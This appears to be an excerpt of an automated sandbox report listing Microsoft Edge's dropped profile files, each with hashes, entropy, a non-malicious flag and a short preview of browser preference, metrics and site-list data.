                                                                                                                                                                                                                                                            SHA-512:A1F2833BD20E4163332035CD6D695AA8F2342D0C7B1E0F92659DB40DEF57F1CB7B6BFAFAAECC7DB6F78FD3C6B9340C9BEAC94AD69709CF2BF3B6D897EAB271E7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):107893
                                                                                                                                                                                                                                                            Entropy (8bit):4.64013178578393
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7B:fwUQC5VwBIiElEd2K57P7B
                                                                                                                                                                                                                                                            MD5:4534E13AE50BA33B19D3D3C5792108BD
                                                                                                                                                                                                                                                            SHA1:673B117572D45A867B2EDA0B137273EE571B9068
                                                                                                                                                                                                                                                            SHA-256:C1DF2A2CC038B6895860E1F5CE7128393EF389A59075392521C93A05FC2EEC43
                                                                                                                                                                                                                                                            SHA-512:A1F2833BD20E4163332035CD6D695AA8F2342D0C7B1E0F92659DB40DEF57F1CB7B6BFAFAAECC7DB6F78FD3C6B9340C9BEAC94AD69709CF2BF3B6D897EAB271E7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                                                                                            MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                            SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                            SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                            SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                                                                                            MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                            SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                            SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                            SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                                                                                                                            Entropy (8bit):0.04485980037211375
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:Lcz08YiNtm7nOAtaYlJgA8x5XSggykfhMNNE4RIr9ERQsZW8XXn8y08Tcm2RGOdB:4z0MtIrgk9hgwYU8H08T2RGOD
                                                                                                                                                                                                                                                            MD5:BBC73AE9229FBF8BCC4504D93225B05E
                                                                                                                                                                                                                                                            SHA1:52B60C9CD996A26FE373CAD2BB9220AA84B2F42F
                                                                                                                                                                                                                                                            SHA-256:6EAE5B0EB9930991BC6D62CAB4378F2EA1408E6F3A7AC40B77E229C52C969DDF
                                                                                                                                                                                                                                                            SHA-512:854D962C5DF5D504D1534F86C434A2CCED46FDDE95BF25B40FACBC662CD1C3A248AD90901D2A46B56404781D2B72ED259418B7727D0110706D1C53AC099DA2D5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:...@..@...@.....C.].....@...............pe..(U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ymcvgw20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........5...... .2................ ..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                                                                                                                            Entropy (8bit):0.42702653392394774
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:shvXR8JJ2no2Z89WvcDYAog1HFeqNsBkgYI0AwxtodMq5TKtg1HFn:+XRWL2Z3yYAoaHTs6gvdjdMq5TKtaHN
                                                                                                                                                                                                                                                            MD5:710D4517545BBF0C11A5B63414C216F8
                                                                                                                                                                                                                                                            SHA1:A36DA943F40F51DE086F7E64A94F02D93A801573
                                                                                                                                                                                                                                                            SHA-256:1BE6B2B0822ABA2C11A60FA9F5B2D429D33DB0D82BC335F08BD866FF60FFBE08
                                                                                                                                                                                                                                                            SHA-512:1D2F6BE9DE69CBE60EB2FB92986C5210D98E2D57847D1E4B5D467D37024BDC595B55F23566EE11E8892976404A7AA964809325963A69D3862AD7388F4B0A9C04
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ymcvgw20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K..>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2...
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):280
                                                                                                                                                                                                                                                            Entropy (8bit):4.105637406271287
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJH1l:o1cUh4Y3LbO/BVsJDbYuDRBOyc
                                                                                                                                                                                                                                                            MD5:8660765C6CB24A26958682B391A96403
                                                                                                                                                                                                                                                            SHA1:A418E7FD45DD9B88C753B0A017495D39984A3531
                                                                                                                                                                                                                                                            SHA-256:7B7085493A4DC305ADFFCF9EE2BFF29307502BF9ED32FEACCBE6D805DC19A3F6
                                                                                                                                                                                                                                                            SHA-512:D6AE89CCE47862ED6C2AC0E8EDC486969E49A8214D8288045C37D7097EFA9CA1AC569EA9ACBF03F4DFDED6B2C36663899BFAAE19F1288B298A20E0C5C139EE20
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):13667
                                                                                                                                                                                                                                                            Entropy (8bit):5.262702784068933
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:st/J99QTryDigabatSuy9s95OaFvrE61ikN3Q82bV+F7cQAHOt73D+PscGJ:st/PGKSuys95OCDLWbGQQUOt73DZ
                                                                                                                                                                                                                                                            MD5:2FE4F11112D330756540916D4F4490AE
                                                                                                                                                                                                                                                            SHA1:8CEE5A0B3DDAEC3E63069EC8978DD2644AECD32B
                                                                                                                                                                                                                                                            SHA-256:1A46799232001DF070EDF0DF88839A21E1DBA130D05F8DFBFCBD0B36C9449E8B
                                                                                                                                                                                                                                                            SHA-512:A66ECEEA72F93F53FDB490EA28D189EF31CC9F258ECA0DEBD5FF39CDA002457EEB4697D62B6B9F1428B94DBA4D102FB94016BB69464E3F6A5BF6DB8A7C140820
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13385827393488894","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):115717
                                                                                                                                                                                                                                                            Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                            MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                            SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                            SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                            SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                                                                                                            Entropy (8bit):5.567532216382058
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lxnnNAWCWW5wLTf4uF8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP4kIrwL5rwXGhpWjO:lFNAHWWaLTfLFu1jalZ6KWujtQ
                                                                                                                                                                                                                                                            MD5:349B1938A9CEC62B3FF16064B92C0672
                                                                                                                                                                                                                                                            SHA1:080763AB47AFE1D02AE0C8A9827D710FBCEDF422
                                                                                                                                                                                                                                                            SHA-256:08F686618929E8525C279FC9FFCBAC230841D4181846867CEF79465A52943FAB
                                                                                                                                                                                                                                                            SHA-512:BB1DD90A45312DD9294317620B29EC6C584360E3FFD3D1ACEFCC5A541A014FE9E6597CB6B1E0B1F726E47EA21BE96A3A980F2010C8ADB8B85692C9ACE1CFB9D7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385853605926868","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385853605926868","location":5,"ma
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):13667
                                                                                                                                                                                                                                                            Entropy (8bit):5.262658113594501
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:st/J99QTryDigabatSuy9s95OaFvrE61ikN3Q82bV+F7cQA2Ot73D+PscGJ:st/PGKSuys95OCDLWbGQQ5Ot73DZ
                                                                                                                                                                                                                                                            MD5:33639645A405B1564E6E7C36BD5DABF8
                                                                                                                                                                                                                                                            SHA1:BD96AFF21AEEB1FF554F4353AB40A9C686254C19
                                                                                                                                                                                                                                                            SHA-256:F30F19C12AADFF834205F81B130BEE64BEC791D06122585CB60257A0DFCA424E
                                                                                                                                                                                                                                                            SHA-512:9B3A2D96A2E40733C7AD647409D747919FE0E8A860477CFDB3BB6EAF0706929E5ABBA236CF16EB59B84CCA9156C22A6BA3F833411167174FC8E6F28A9637F736
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13385827393488894","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):40504
                                                                                                                                                                                                                                                            Entropy (8bit):5.5612744881015415
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lxqnHAWVo7pLGLxAWW5wLTf4HF8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPUSjkIrwO:lMHAWUcxAWWaLTfwFu1ja9SjZhKwHSmb
                                                                                                                                                                                                                                                            MD5:11EFF1919FF37778062234F0B9F6D861
                                                                                                                                                                                                                                                            SHA1:27FA1196EFB3DA3A6BFFB039FE6DFD626BCA53BB
                                                                                                                                                                                                                                                            SHA-256:DB145A472AA174EAA7AB0B85456E89F8B93FF51277073075DABAD8B8A865C8CF
                                                                                                                                                                                                                                                            SHA-512:F92DCCDC3DF5951AAF28A37E37B5077ED320BEEC6E255310D36412CEA9CF27688A57965317CE7C38B2DA8A9A4588F34A1D46B3255769F78AE8DEF8908AD23966
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385853605926868","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385853605926868","location":5,"ma
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):13502
                                                                                                                                                                                                                                                            Entropy (8bit):5.264761216648299
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:st/J99QTryDigabatSuy9s95OaFvrE61ikN3Q82bV+F7cQAHOthUD+PscGJ:st/PGKSuys95OCDLWbGQQUOtiDZ
                                                                                                                                                                                                                                                            MD5:345F1B389CC70AF6D150ED99C719AD94
                                                                                                                                                                                                                                                            SHA1:56597027BA5DA82E89A9454FA7CD9379DF03B8D3
                                                                                                                                                                                                                                                            SHA-256:40B773F7A89F417607967ADD34161012A0F84CEDB4F783F201818DA06FDD290B
                                                                                                                                                                                                                                                            SHA-512:53A8811F9EDDB946F0DF967BB938806588895F88D57DE41CF095D4EED0F38B3390AC4838FADDC5A52A4EF78235689793D0DD30A8BBCF5DB2231781A5F6727B35
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13385827393488894","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):33
                                                                                                                                                                                                                                                            Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                            MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                            SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                            SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                            SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):313
                                                                                                                                                                                                                                                            Entropy (8bit):5.230308760545484
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypHmAB1N723oH+Tcwtp3hBtB2KLlMpwI+q2PN723oH+Tcwtp3hBWsIFUv:7ypHmABaYebp3dFLOpn+vVaYebp3eFUv
                                                                                                                                                                                                                                                            MD5:2038E4319FBDA35B9B39AF3477A496F5
                                                                                                                                                                                                                                                            SHA1:49508F6E46F3295DFE35E90A73A6C06E5CBB3C13
                                                                                                                                                                                                                                                            SHA-256:584876D9F45360D99E600A5E3FBC6CB16FB2F2349C47466F5AC10D27BB5F2115
